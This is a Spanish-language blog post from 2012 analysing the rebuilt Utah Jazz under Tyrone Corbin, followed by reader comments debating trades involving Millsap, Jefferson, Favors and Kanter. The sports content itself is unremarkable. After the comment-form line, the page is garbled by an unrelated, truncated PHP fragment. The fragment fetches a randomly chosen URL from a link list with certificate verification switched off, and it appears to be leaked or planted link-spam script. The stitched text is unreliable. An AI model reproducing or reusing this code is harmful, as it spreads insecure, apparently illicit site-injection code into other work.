Utah Jazz: La sombra de Sloan

17 de January de 2012 por TheDeerHunter

Es una sensación extraña. Han sucedido tantas cosas en la liga que apenas podemos asimilar todos los cambios.

Hace menos tiempo de lo que parece teníamos en Utah Jazz una de las franquicias más estables, con una identidad muy definida y unas caras familiares para todos nosotros. Sloan, Deron, AK47, Boozer, Okur… “viejos conocidos”, como titulábamos nuestro análisis de hace dos años. Una época donde era apuesta segura contar con ellos para postemporada. Pero ahora, ¿todos sabemos quién es su técnico? ¿Qué jugadores salen de titulares? ¿Cuántos minutos juegan habitualmente? ¿Cuál es su estilo de juego? ¿Cuántos les colocamos entre los 8 primeros del Oeste en la porra?

Pues bien. os presento al equipo de Tyrone Corbin, una de las sensaciones positivas hasta el momento. Está comprobado que el GM leyó nuestros consejos de Junio y  los siguió prácticamente a pies juntillas: fuera Kirilenko y Okur, confiar en Hayward, renovar a CJ Miles, contratar un escolta… Si acaso les falta encontrar ese escolta titular en lugar de Raja Bell. Démosles tiempo.

El caso es que Corbin ha conseguido un equipo equilibrado y serio que ataca, defiende, rebotea, asiste…  y se mueve siempre en el tramo medio-alto de la liga en todos los apartados medibles involucrando con bastante acierto a todos los elementos de los que dispone. No se le puede poner ningún pero, de momento.

Tampoco conviene perder la perspectiva. La franquicia ha sufrido su momento más traumático desde la retirada de Malone y Stockton. Casi me atrevería a afirmar que la situación ha sido aún más convulsa, porque aquello era de esperar llegado el momento. ¿Ha sido el proceso de reconstrucción más fuerte de sus últimos 20 años? Podría ser. No cabe duda que allí el nivel de exigencia se ha establecido en un 50% de victorias de reloj, como mínimo. La etapa Sloan ha malacostumbrado una franquicia que por mimbres debería haber aspirado a unos resultados mucho más humildes. Aunque ese nivel de exigencia también lleva implícito una filosofía de trabajo que quizás obtenga como fruto un proceso de reconstrucción menos doloroso. El buen panorama inmediato puede llevar a pensar que estos Jazz obligatoriamente deben de estar arriba como así ha sido siempre. En estos momentos lo están, pero estamos hablando de una plantilla con un núcleo más cercano a los 20 que a los 30. Mucho cuidado con qué objetivos se plantean para el actual curso.

La joya de la corona de los actuales Jazz es su juego interior. No hay en toda la liga un cuarteto de hombres grandes con tanto potencial. Al Jefferson se ha encontrado a sí mismo como líder y está bien arropado por Paul Millsap.  Derrick Favors les da descanso y muestra detalles de calidad muy a tener en cuenta  y Enes Kanter, de momento, aguarda su oportunidad. Cuarto pívot que muchos querrían tener como segundo. Los dos reservas son dos diamantes en bruto de incalculable valor.

Como aleros, no están echando demasiado de menos a Kirilenko. Gordon Hayward cumple y viene desarrollando su juego pero Josh Howard se ha mostrado como uno de los fichajes más acertados. Sería fantástico que su cabeza y su cuerpo mantengan esta sintonía. De CJ Miles siempre se puede esperar un trabajo oscuro y continuo. Si acaso el patito feo es Jeremy Evans, que no tiene sitio en el equipo.

La posición de escolta en principio la cubre Raja Bell, el más veterano de la plantilla. Es cierto que dijimos que no lo consideramos un verdadero escolta titular, pero sería injusto negarle sus méritos como hombre de intendencia y especialista. Se mata por cumplir y lo logra,  asumiendo que sus momentos más brillantes no volverán. Para suplirle van dándole minutos al rookie Alec Burks, aunque mientras se va asentando en la liga Hayward y Howard van alternándose para ayudar aquí.

A priori la posición más gris viene siendo la de base. Es triste decirlo por Devin Harris. ¿En qué momento perdiste la chispa, chaval? Estos son los nocivos efectos de Avery Johnson. Le suple Earl Watson, otro currante trotamundos de la vida. Pocas o ningunas esperanzas hay en recuperar a Jamaal Tinsley para la causa.

En definitiva y al contrario de lo que pueda parecer, lo importante ahora mismo debe de ser desarrollar a su joven bloque, independientemente de los resultados. Obviamente a nadie le amarga un dulce andar con más victorias que derrotas y la experiencia de playoffs sería fantástica.

Quinteto: Devin Harris, Raja Bell, Gordon Hayward, Paul Millsap, Al Jefferson
6º Hombre: Josh Howard

Pronóstico: Pueden rondar el 50% y la 8ª plaza de postemporada, pero lo normal sería que no la alcanzasec

Comenta

23 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Solución: que vuelga Ostertag, Borchardt y Raúl López. No veo que otra cosa pueden hacer…

      Citar

  2. Viva_Dirk dice:
    #2

    Tienen un buen equipo para mejorar y alternativas para traspasos, a mi me mola bastante el equipo.

    Eso si, en el verano de 2013 toca renovar a Millsap&Jefferson, y de rebote a Harris.

      Citar

  3. melo15 dice:
    #3

    Pues algo habran de hacer, yo echaria a Milsap, Favors tiene potencial para ser mejor, que lo cambien, por un buen base o algo asi, y a harris por otro jugador

      Citar

  4. Sancho88 dice:
    #4

    yo echaría a Millsap, a Jefferson y a Hayward y ficharía a Milicic, Aaron Gray y Nocioni

      Citar

  5. busky23 dice:
    #5

    Buen bloque han armado en Utah,sin duda estaran al 50% de victorias,aunque las posiciones 7-8 en el Oeste van a estar muy caras.
    El nivel de motivación que muestre AlJefferson durante el año marcará mucho el rumbo del equipo,es muy fiable como está demostrando pero tiende a dejarse llevar.

    Traspasar a Millsapp?,jamás,si se diera el caso teniendo tipos jóvenes y mas que aprovechables en la pintura como Favors y Kanter  yo movería ficha con Al Jefferson con el objetivo de buscar reforzar el perímetro.
    Tampoco les iría nada mal recuperar al viejo Harris y meter a Hayward una temporadita en el Gym.

      Citar

  6. melo15 dice:
    #6

    Porque Jefferson si y Milsap no?

      Citar

  7. ralage dice:
    #7

    melo15:
    Porque Jefferson si y Milsap no?

    1º por su contrato 15M respecto a casi 7

    Despúes porque Millsap tiene: tiro de media distancia, actitud, compromiso y + conocimiento del juego y
    finalmente como se ha dicho, el rol de Jefferson puede ser a medio plazo ocupado por Kanter o Favors

      Citar

  8. Esteban dice:
    #8

    Yo en primer lugar cambiaria a kanter o favors q tienen un valor enorme HOY, nose cuanto valdran en un futuro, kanteer cada vez demuestra menos y favors en dos años en la liga todavia no pudo hacerse titular en su equipo, quiza mas de lo q vale, mientras q jefferson y millsap la estan rompiendo y son una realodad y tienen todavia varios años mas, mientras q los dos numeros 3 aun deben progresar y pueden conseguir valores por ellos, ambos por ellis, el escolta q necesitan…

    Al dia de hoy corbin, vogel y scott candidatos a entrenadores del año

      Citar

  9. Vader dice:
    #9

    El futuro tiene que ser Kanter, Favors y Hayward. Con Milsap podria contar pero Jefferson y Harris a medio, largo plazo no deberian entrar en los planes de la franquicia. Les iria de perlas tener una buena ronda para el año que viene porque en la agencia libre los Jazz siempre han tenido muchos problemas para atraer gente.

    A ver como se desarrollan Kanter y Favors pero a priori son dos jovenes interiores de lo mejorcito que ha salido en los últimos drafts a parte de Griffin y Monroe.

    Saludos

      Citar

  10. Esteban dice:
    #10

    Kanter uno de los mejores internos? No juega mas de 14 min por partido con promedios malos

    La nba esta llena de franquicias armadas en base a lo de podran llegar a ser jugadores y q finalmewnte no lo son, yo ni loco me moveria de jefferon y milsap, jefferson es muy criticado, pero es uno de los unicos 5 pivot capaces de de meter un 20 y 10, creen q favors y kanter pueden llegar a hacer eso? O los 17 y 8 de milsap

    Tan buenos pueden ser favors y kanter?

      Citar

  11. jose antonio ramirez dice:
    #11

    A dia de hoy y sin saber que pasara con los movimientos del mercado en febrero de esta temporada atipica, utah encaja en esa definicion de equipo raro e incluso atipico. Son un conjunto con muchos interrogantes, si bien opino que este año tienen mas a ganar que a perder. Tiene posiblemente el mejor juego interior de la liga, por cantidad y calidad. Los puestos exteriores son los que veo mas descompensados, falta un anotador claramente, y aunque soy muy fan de hayward, el no tiene esa capacidad todavia para echarse el equipo a la espalda como en la universidad. Este equipo traspasando a harris y fichando un escolta o un alero anotador seria un fijo en play-offs, mientras tanto coincido con el analisis en que pueden meterse pero seria una sorpresa teniendo en cuenta la competividad del oeste. Si siguen en esta linea de hacer las cosas, desapacito y casi sin hacer ruido, ojo en proximos años porque le falta muy poco para ser un candidato al oeste. Nunca suelo comentar analisis, pero el echo es que me llamaba la atencion lo relacionado que estaba esta temporada atipica con este equipo. Gracias.

      Citar

  12. melo15 dice:
    #12

    Hombre, es que con Milsap y Jefferson, con 30 minutos cada uno es dificil hacerse un sitio, aunque Favors, me encanta, tiene un fisico envidiable, si desarrolara un buen tiro de media distancia seria bastante bueno.
    Favors, el nuevo Malone!!!

      Citar

  13. Esteban dice:
    #13

    Si favors es el nuevo malone griffin es la reencarnacion de jordan, wilt y russel juntos

      Citar

  14. Jose Luis dice:
    #14

    Comenta más veces jose antonio, que aquí todos aportamos y parece que tu capacidad de análisis es bastante buena. Anímate hombre

      Citar

  15. melo15 dice:
    #15

    Era una broma, pero te imaginas!!! Yo creo que se parecen en muchos aspectos, sin comparar claro, The Mailman es insuperable, pero Favors es mi debilidad

      Citar

  16. The wolf dice:
    #16

    Pues Jeremy Evans esta ultimamente jugando cerca de 20 minutos y haciendolo bien…anoche tuvo 4/4 + 1 tiro libre…3 rebotes y un par de alley-hoops curiosos…vamos se le ve como un buen saltarin y un tio muy atletico…si juega por partido 20 minutitos o asi y aporta pues le va a ir muy bien…

    A todo esto…15 partidos seguidos de Utah ganados en casa…magnifica racha me gusta este equipo

      Citar

  17. alf dice:
    #17

    Creo que hayward,favors,burks, kanter, milshap, uscar un razabalanca tirador y ya tenemos equipo para el futuro y que os parece cambiar a pau por jefferson y harris, buff gual no cuela jeje

      Citar

  18. Sancho88 dice:
    #18

    Bueno, no sé si ese sería el cambio, pero es cierto que Pau no encaja para nada en el sistema de Mike Brown. Era eje principal con Jackson, pero no así ahora. A Lakers les vendría muy bien Deron Williams este verano. Quizás un Williams por Pau, así a pelo, podría ser. Y hablo desde el punto de vista de interés de Lakers y de Nets. Ya sé que Pau no le molaría nada ir allí.

      Citar

  19. melo15 dice:
    #19

    Tu crees que es viable, Pau es mas mayor que Deron, y peor

      Citar

  20. Sancho88 dice:
    #20

    Sí, pero si no le traspasan los Nets, se iría gratis no?

      Citar

  21. Nacho dice:
    #21

    melo15: Tu crees que es viable, Pau es mas mayor que Deron, y peor

    Peor, ¿por qué?
    Que conste que junto con Rondo, (y ahora Ricky, jeje) para mí es el mejor base de la liga, el que más me mola ver y tal, pero decir que es mejor que un tipo que ha demostrado lo que ha demostrado… ¡pufff!, me da como que no se qué. Los mejores GANAN. Uno ha ganado un oro olímpico (que es la leche), y el otro ni te cuento. A ver la influencia de cada uno en los triunfos. Y tampoco estoy diciendo que Pau sea mejor que Deron, pero me parece que seguimos sin darle el mérito que se merece. ¡Qué país!

      Citar

  22. Drheam dice:
    #22

    Yo desde luego tambien soy de la opinion de traspasar a Al por un exterior.

      Citar

  23. kantonyo dice:
    #23

    Coincido con Nacho, no estoy nada de acuerdo en que Deron sea mejor que Pau, y está en su peor momento en la NBA…. bueno en verdad lo están los dos.

    Aunque en un traspaso yo creo que vale más Deron, 27 años contra los 31 de Gasol.

    Además Gasol cobra 18M$x3 años y Deron 16M$x2 años. (56 de uno con 32 del otro en total.)

    El TRADE MACHINE de ESPN aceptaría ese fichaje…. aunque yo si fuera Nets pediría algo más, por ejemplo a Barnes en el traspaso, que parece que también la Machine lo acepta…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>